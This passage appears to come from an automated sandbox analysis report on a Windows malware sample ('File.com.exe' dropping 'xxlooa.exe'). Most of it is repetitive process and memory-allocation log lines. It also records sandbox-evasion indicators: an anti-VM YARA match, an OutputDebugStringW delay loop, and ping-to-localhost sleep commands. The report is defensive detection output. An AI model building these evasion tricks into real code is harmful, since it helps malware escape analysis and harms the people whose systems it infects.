Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: File.com.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xxlooa.exe PID: 916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xxlooa.exe PID: 7252, type: MEMORYSTR

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Users\user\AppData\Roaming\xxlooa.exe

Section loaded: OutputDebugStringW count: 197

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior

Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 2B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 5EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 6EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 7000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 8000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Memory allocated: 8270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 4AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 60D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 5C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 70D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 80D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 6180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: A540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: B540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 71D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 25E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 27F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 25E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 5DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 6DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 6F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 7F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: 6F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: A100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Memory allocated: B100000 memory reserve \| memory write watch
